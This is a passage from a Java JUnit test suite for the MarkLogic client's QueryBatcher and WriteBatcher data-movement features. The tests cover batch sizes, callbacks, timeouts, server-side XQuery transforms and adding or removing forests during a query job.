"{\"query\":{\"value-constraint-query\":{\"constraint-name\":\"id\", \"text\":\"0026\"}}," + "\"options\":{\"return-metrcs\":false, \"return-qtext\":false, \"debug\":true, \"transorm-results\":{\"apply\":\"raw\"}," + "\"constraint\":{\"name\":\"id\", \"value\":{\"element\":{\"ns\":\"\", \"name\":\"id\"}}}}}}"; System.out.println("QUERY IS : "+ combinedQuery); // create a handle for the search criteria StringHandle rawHandle = new StringHandle(combinedQuery); rawHandle.setFormat(Format.JSON); QueryManager queryMgr = client.newQueryManager(); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str).append('|'); } batchResults.append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); Forest forest = throwable.getForest(); batchFailResults.append("Test has Exceptions") .append('|') .append(throwable.getForestResultsSoFar()) .append('|') /*.append(throwable. getJobRecordNumber()) .append('|') .append(throwable.getBatchRecordNumber()) .append('|') .append(throwable.getSourceUri()) .append('|') .append(throwable.getMimetype()) .append('|') */ .append(forest.getForestName()) .append('|') .append(forest.getHost()) .append('|') .append(forest.getDatabaseName()) .append('|') /*.append(forest.isDeleteOnly()) .append('|')*/ .append(forest.isUpdateable()); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { // Write out and assert on query failures. System.out.println("Exception Buffer contents on Query Exceptions received from callback onQueryFailure"); System.out.println(batchFailResults.toString()); // Remove this failure once there are no NPEs and doa asserts on various counters in failure scenario. fail("Test failed due to exceptions"); } } } /* * To test QueryBatcher's callback support by invoking the client object to do a lookup * Insert only one document to validate the functionality * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherCallbackClient() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherCallbackClient"); String[] filenames = {"constraint1.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); batcher.add("contraints1.json", contentHandle1); // Flush batcher.flushAndWait(); StringBuffer batchFailResults = new StringBuffer(); String expectedStr = "Vannevar Bush wrote an article for The Atlantic Monthly"; QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("Vannevar"); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.withBatchSize(1000); //Hold for contents read back from callback client. StringBuffer ccBuf = new StringBuffer(); queryBatcher1.onUrisReady(batch-> { // Do a lookup back into the database with the client and batch content. // Want to verify if the client object can be utilized from a Callback. JSONDocumentManager docMgr = batch.getClient().newJSONDocumentManager(); JacksonHandle jh = new JacksonHandle(); docMgr.read(batch.getItems()[0], jh); System.out.println("JH Contents is " + jh.get().toString()); System.out.println("Batch Contents is " + batch.getItems()[0]); ccBuf.append(jh.get().toString()); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions").append('|'); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { // Write out and assert on query failures. System.out.println("Exception Buffer contents on Query Exceptions received from callback onQueryFailure"); System.out.println(batchFailResults.toString()); fail("Test failed due to exceptions"); } System.out.println("Contents from the callback are : " + ccBuf.toString()); // Verify the Callback contents. assertTrue("Lookup for a document from Callback using the client failed", ccBuf.toString().contains(expectedStr)); } } /* * Test to validate QueryBatcher when there is no data. * No search results are returned. */ @Test public void testQueryBatcherWithNoData() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherWithNoData"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); // Run a QueryBatcher when no results are returned. QueryBatcher queryBatcherNoResult = dmManager.newQueryBatcher(querydef); StringBuilder batchNoResults = new StringBuilder(); StringBuilder batchNoFailResults = new StringBuilder(); queryBatcherNoResult.onUrisReady(batch -> { for (String str : batch.getItems()) { batchNoResults.append(str).append('|'); } }); queryBatcherNoResult.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure when no results returned"); // Should be empty in a successful run. Else fill the buffer to report error. batchNoFailResults.append("Test has Exceptions"); batchNoFailResults.append("|"); }); JobTicket jobTicketNoRes = dmManager.startJob(queryBatcherNoResult); queryBatcherNoResult.awaitCompletion(30, TimeUnit.SECONDS); if (queryBatcherNoResult.isStopped()) { assertTrue("Query returned no results when there is no data" , batchNoResults.toString().isEmpty()); } } /* * To test query by example with WriteBatcher and QueryBatcher * 1) Verify batch size on QueryBatcher. * * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherBatchSize() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherBatchSize"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 1K documents for (int i = 0; i < 1000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // Run a QueryBatcher with a large AwaitTermination. QueryBatcher queryBatcherbatchSize = dmManager.newQueryBatcher(querydef); queryBatcherbatchSize.withBatchSize(20); Calendar calBef = Calendar.getInstance(); long before = calBef.getTimeInMillis(); queryBatcherbatchSize.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()).append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherbatchSize.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|'); }); JobTicket jobTicket = dmManager.startJob(queryBatcherbatchSize); // Make sure to modify TimeUnit.TIMEUNIT.Method(duration) below before the assert queryBatcherbatchSize.awaitCompletion(3, TimeUnit.MINUTES); Calendar calAft; long after = 0L; long duration = 0L; long queryJobTimeoutValue = 0L; while(!queryBatcherbatchSize.isStopped()) { // do nothing. } // Check the time of termination calAft = Calendar.getInstance(); after = calAft.getTimeInMillis(); duration = after - before; queryJobTimeoutValue = TimeUnit.MINUTES.toSeconds(duration); if (queryBatcherbatchSize.isStopped()) { System.out.println("Duration is ===== " + queryJobTimeoutValue); System.out.println(batchResults.toString()); assertEquals("Number of batches should have been 50", batchResults.toString().split("\\|").length, 50); } //Clear the contents for next query host batcher object results. batchResults.delete(0, (batchResults.capacity() -1)); batchFailResults.delete(0, (batchFailResults.capacity() -1)); // Run a QueryBatcher with a small AwaitTermination. QueryBatcher queryBatcherSmallTimeout = dmManager.newQueryBatcher(querydef); queryBatcherSmallTimeout.withBatchSize(1000); queryBatcherSmallTimeout.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()).append('|'); System.out.println("QueryBatcher with 1000 batch size - Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherSmallTimeout.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions").append('|'); batchFailResults.append(throwable.getJobBatchNumber()); }); JobTicket jobTicketTimeout = dmManager.startJob(queryBatcherSmallTimeout); queryBatcherSmallTimeout.awaitCompletion(5, TimeUnit.MILLISECONDS); if (queryBatcherSmallTimeout.isStopped()) { System.out.println(batchResults.toString()); assertNotEquals("Number of batches should not have been 1", batchResults.toString().split("\\|").length, 5); } if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { assertTrue("Exceptions not found when query time out value reached", batchFailResults.toString().contains("Test has Exceptions")); } } /* * To test query by example with WriteBatcher and QueryBatcher * 1) Verify awaitTermination method on QueryBatcher. * * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherFailures() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherFailures"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 10 K documents for (int i = 0; i < 10000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherAwait = dmManager.newQueryBatcher(querydef); Calendar calBef = Calendar.getInstance(); long before = calBef.getTimeInMillis(); JobTicket jobTicket = dmManager.startJob(queryBatcherAwait); // Make sure to modify TimeUnit.MILLISECONDS.Method(duration) below before the assert queryBatcherAwait.awaitCompletion(30, TimeUnit.SECONDS); queryBatcherAwait.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcherAwait.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|'); }); Calendar calAft; long after = 0L; long duration = 0L; long quertJobTimeoutValue = 0L; while(!queryBatcherAwait.isStopped()) { // do nothing } // Check the time of termination calAft = Calendar.getInstance(); after = calAft.getTimeInMillis(); duration = after - before; quertJobTimeoutValue = TimeUnit.MILLISECONDS.toSeconds(duration); if (queryBatcherAwait.isStopped()) { System.out.println("Duration is " + quertJobTimeoutValue); if (quertJobTimeoutValue >= 30 && quertJobTimeoutValue < 35) { assertTrue("Job termination with awaitTermination passed within specified time", quertJobTimeoutValue >= 30 && quertJobTimeoutValue < 35); } else if (quertJobTimeoutValue > 35) { fail("Job termination with awaitTermination failed"); } } } @Test public void testServerXQueryTransform() throws IOException, ParserConfigurationException, SAXException, TransformerException, InterruptedException, XPathExpressionException { System.out.println("Running testServerXQueryTransform"); String transformFileDir = dataConfigDirPath + "/transforms/"; TransformExtensionsManager transMgr = client.newServerConfigManager().newTransformExtensionsManager(); ExtensionMetadata metadata = new ExtensionMetadata(); metadata.setTitle("Adding attribute xquery Transform"); metadata.setDescription("This plugin transforms an XML document by adding attribute to root node"); metadata.setProvider("MarkLogic"); metadata.setVersion("0.1"); // get the transform file from add-attr-xquery-transform.xqy File transformFile = new File(transformFileDir +"add-attr-xquery-transform.xqy"); FileHandle transformHandle = new FileHandle(transformFile); transMgr.writeXQueryTransform("add-attr-xquery-transform", transformHandle, metadata); ServerTransform transform = new ServerTransform("add-attr-xquery-transform"); transform.put("name", "Lang"); transform.put("value", "English"); String xmlStr1 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>This is so foo</foo>"; String xmlStr2 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>This is so bar</foo>"; //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(5); batcher.withTransform(transform); StringHandle handleFoo = new StringHandle(); handleFoo.set(xmlStr1); StringHandle handleBar = new StringHandle(); handleBar.set(xmlStr2); String uri = null; // Insert 10 documents for (int i = 0; i < 10; i++) { uri = "foo" + i + ".xml"; batcher.add(uri, handleFoo); } for (int i = 0; i < 10; i++) { uri = "bar" + i + ".xml"; batcher.add(uri, handleBar); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("foo OR bar"); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.withBatchSize(5); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str); batchResults.append("|"); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); if (queryBatcher1.isStopped()) { // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Query results URI list length returned after transformation incorrect", res.length, 20); // Get a random URI, since the URIs returned are not ordered. Get the 3rd URI. assertTrue("URI returned not correct", res[2].contains("foo") || res[2].contains("bar")); // do a lookup with the first URI using the client to verify transforms are done. DOMHandle readHandle = readDocumentUsingDOMHandle(client, res[0], "XML"); String contents = readHandle.evaluateXPath("/foo/text()", String.class); // Verify that the contents are of xmlStr1 or xmlStr2. System.out.println("Contents are : " + contents); assertTrue("Lookup for a document from Callback using the client failed", xmlStr1.contains(contents) || xmlStr2.contains(contents)); } // release client client.release(); } /* * To test QueryBatcher functionality (errors if any) when a Forest is being removed and added during a start job. * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherWithForestRemoveAndAdd() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherWithForestRemoveAndAdd"); String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1", "QBMultipleForestDB-2", "QBMultipleForestDB-3"}; try { //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); setupAppServicesConstraint(testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 20K documents to have a sufficient large query seek time for (int i = 0; i < 20000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherAddForest = dmManager.newQueryBatcher(querydef); queryBatcherAddForest.withBatchSize(2000); queryBatcherAddForest.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()) .append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherAddForest.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|') .append(throwable.getMessage()); }); JobTicket jobTicket = dmManager.startJob(queryBatcherAddForest); queryBatcherAddForest.awaitCompletion(3, TimeUnit.MINUTES); // Now add a Forests to the database. createForest(testMultipleForest[1], testMultipleDB); createForest(testMultipleForest[2], testMultipleDB); while(!queryBatcherAddForest.isStopped()) { // Do nothing. Wait for batcher to complete. } if (queryBatcherAddForest.isStopped()) { if (batchResults!= null && !batchResults.toString().isEmpty()) { System.out.print("Results from onUrisReady === "); System.out.print(batchResults.toString()); // We should be having 10 batches numbered 1 to 10. assertTrue("Batches not complete in results", batchResults.toString().contains("10")); } if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResults.toString()); assertTrue("Exceptions not found when forest added", batchFailResults.toString().contains("Test has Exceptions")); } } // Reomove a forest. StringBuffer batchResultsRem = new StringBuffer(); StringBuffer batchFailResultsRem = new StringBuffer(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherRemoveForest = dmManager.newQueryBatcher(querydef); queryBatcherRemoveForest.withBatchSize(2000); queryBatcherRemoveForest.onUrisReady(batch-> { batchResultsRem.append(batch.getJobBatchNumber()) .append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherRemoveForest.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResultsRem.append("Test has Exceptions"); batchFailResultsRem.append("|"); batchFailResultsRem.append(throwable.getMessage()); }); JobTicket jobTicketRem = dmManager.startJob(queryBatcherRemoveForest); queryBatcherRemoveForest.awaitCompletion(3, TimeUnit.MINUTES); // Now remove a Forest from the database. detachForest(testMultipleDB, testMultipleForest[2]); deleteForest(testMultipleForest[2]); while(!queryBatcherRemoveForest.isStopped()) { // Do nothing. Wait for batcher to complete. } if (queryBatcherRemoveForest.isStopped()) { if (batchResultsRem!= null && !batchResultsRem.toString().isEmpty()) { System.out.print("Results from onUrisReady === "); // We should be having 10 batches numbered 1 to 10. //TODO Add rest of the validations when feature complete. System.out.print(batchResultsRem.toString()); assertTrue("Batches not complete in results when forest removed", batchResultsRem.toString().contains("10")); } if (batchFailResultsRem!= null && !batchFailResultsRem.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResultsRem.toString()); assertTrue("Exceptions not found when forest removed", batchFailResultsRem.toString().contains("Test has Exceptions")); } } } catch(Exception e) { System.out.print(e.getMessage()); } finally { // Associate back the original DB. try { associateRESTServerWithDB(restServerName, dbName); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); //In case something asserts detachForest(testMultipleDB, testMultipleForest[2]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); deleteForest(testMultipleForest[2]); Thread.sleep(10000); } } /* * To test QueryBatcher's callback support with long lookup timefor the client object to do a lookup * Insert documents to validate the functionality. * Induce a long pause which exceeds awaitTermination time. * * @throws IOException * @throws InterruptedException */ @Test public void testBatchClientLookupTimeout() throws IOException, InterruptedException { System.out.println("Running testBatchClientLookupTimeout"); String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1"}; try { //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 2K documents to have a sufficient large query seek time for (int i = 0; i < 20000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuffer batchFailResults = new StringBuffer(); StringBuilder ccBuf = new StringBuilder(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherAddForest = dmManager.newQueryBatcher(querydef); queryBatcherAddForest.withBatchSize(200); queryBatcherAddForest.onUrisReady(batch-> { // Check only once if (ccBuf.toString().isEmpty()) { JSONDocumentManager docMgr = batch.getClient().newJSONDocumentManager(); JacksonHandle jh = new JacksonHandle(); docMgr.read(batch.getItems()[0], jh); try { // Simulate a large time in reading back the results Thread.sleep(40000); } catch (Exception e) { // TODO Auto-generated catch block System.out.println(e.getMessage()); } ccBuf.append(jh.get().toString().trim()); // The first read should exhaust the awaitTermination timeout. Buffer contains only one result. System.out.println("JH Contents is " + jh.get().toString()); System.out.println("Batch Contents is " + batch.getItems()[0]); } batchResults.append(batch.getJobBatchNumber()); batchResults.append("|"); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherAddForest.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions"); batchFailResults.append("|"); batchFailResults.append(throwable.getMessage()); }); // Have a small awaitCompletion timeout for the batcher. JobTicket jobTicket = dmManager.startJob(queryBatcherAddForest); queryBatcherAddForest.awaitCompletion(30, TimeUnit.SECONDS); if (queryBatcherAddForest.isStopped()) { if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResults.toString()); assertTrue("Exceptions not found when forest added", batchFailResults.toString().contains("Test has Exceptions")); } } assertTrue("Batches are available in results when they should not be.", batchResults.toString().isEmpty()); } catch(Exception e) { System.out.print(e.getMessage()); } finally { // Associate back the original DB. try { associateRESTServerWithDB(restServerName, dbName); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); Thread.sleep(10000); } } /* * To test QQueryBatcher when WriteBatcher writes same document. Simulate a deadlock / resource contention. * @throws IOException * @throws InterruptedException */ /*public void testSimultaneousBothBatcherAccess() throws IOException, InterruptedException { System.out.println("Running testSimultaneousBothBatcherAccess"); clearDB(restServerPort); String[] filenames = {"constraint1.json", "constraint2.json", "constraint3.json", "constraint4.json", "constraint5.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); StringBuilder writebatchResults = new StringBuilder(); batcher.add("/batcher-contraints1.json", contentHandle1); batcher.add("/batcher-contraints2.json", contentHandle2); batcher.add("/batcher-contraints3.json", contentHandle3); batcher.add("/batcher-contraints4.json", contentHandle4); batcher.add("/batcher-contraints5.json", contentHandle5); // Flush batcher.flushAndWait(); StringBuffer querybatchResults = new StringBuffer(); StringBuilder querybatchFailResults = new StringBuilder(); // get the query File file = new File(dataConfigDirPath + "qbe1.json"); FileHandle fileHandle = new FileHandle(file); QueryManager queryMgr = client.newQueryManager(); RawQueryByExampleDefinition qbyexDef = queryMgr.newRawQueryByExampleDefinition(fileHandle.withFormat(Format.JSON)); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(qbyexDef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { querybatchResults.append(str) .append('|'); } querybatchResults.append(batch.getForestResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); querybatchFailResults.append("Test has Exceptions"); querybatchFailResults.append(throwable.getMessage()); } ); // Trying to use a WriteBatcher on the same docId. WriteBatcher batcherTwo = dmManager.newWriteBatcher(); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; StringHandle handle = new StringHandle(); handle.set(jsonDoc); // Update contents to same doc uri. batcherTwo.withBatchSize(1); batcherTwo.add("/batcher-contraints11.json", handle); batcherTwo.flushAndWait(); JobTicket jobTicketWriteTwo = dmManager.startJob(batcherTwo); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitTermination(1, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !querybatchFailResults.toString().isEmpty() && querybatchFailResults.toString().contains("Exceptions")) { System.out.println("Query Batch Failed - Buffer Contents are:" + querybatchFailResults.toString()); fail("Test failed due to exceptions"); } if( querybatchResults != null && !querybatchResults.toString().isEmpty()) { // Verify the batch results now. String[] res = querybatchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/batcher-contraints1.json")); assertEquals("Bytes Moved","0", res[1]); assertEquals("Batch Number","0", res[3]); } } }*/ @Test public void testQueryBatcherJobDetails() throws Exception { String testMultipleDB = "QHBJobDetaitDB"; String[] testMultipleForest = {"QHBJobDetaitDB-1"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testQueryBatcherJobDetails"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); setQueryOption(clientTmp, queryOptionName); QueryManager queryMgr = clientTmp.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("0012"); //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchDetails = new StringBuilder(); StringBuilder forestDetails = new StringBuilder(); StringBuilder jobDetails = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); // Batch details batchDetails.append(batch.getJobBatchNumber()) .append('|') .append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForestBatchNumber()); // Get the Forest details Forest forest = batch.getForest(); forestDetails.append(forest.getDatabaseName()) .append('|') .append(forest.getHost()) .append('|') .append(forest.getForestName()); // Get the Job details /*jobDetails.append(batch.getJobTicket().getJobId()) .append('|') .append(batch.getJobTicket().getJobType().name());*/ } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); String jobId = jobTicket.getJobId(); String jobName = jobTicket.getJobType().name(); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints2.xml")); // verify the Job and batch get method values. String[] batchDetailsArray = batchDetails.toString().split("\\|"); assertTrue("Job Batch Number not correct", Long.parseLong(batchDetailsArray[0]) > 0); assertTrue("Job Results So Far Number not correct", Long.parseLong(batchDetailsArray[1]) > 0); assertTrue("Forest Batch Number not correct", Long.parseLong(batchDetailsArray[2]) > 0); // Git Isue 124. For bytesMoved. assertTrue("Job Bytes Moved not correct", 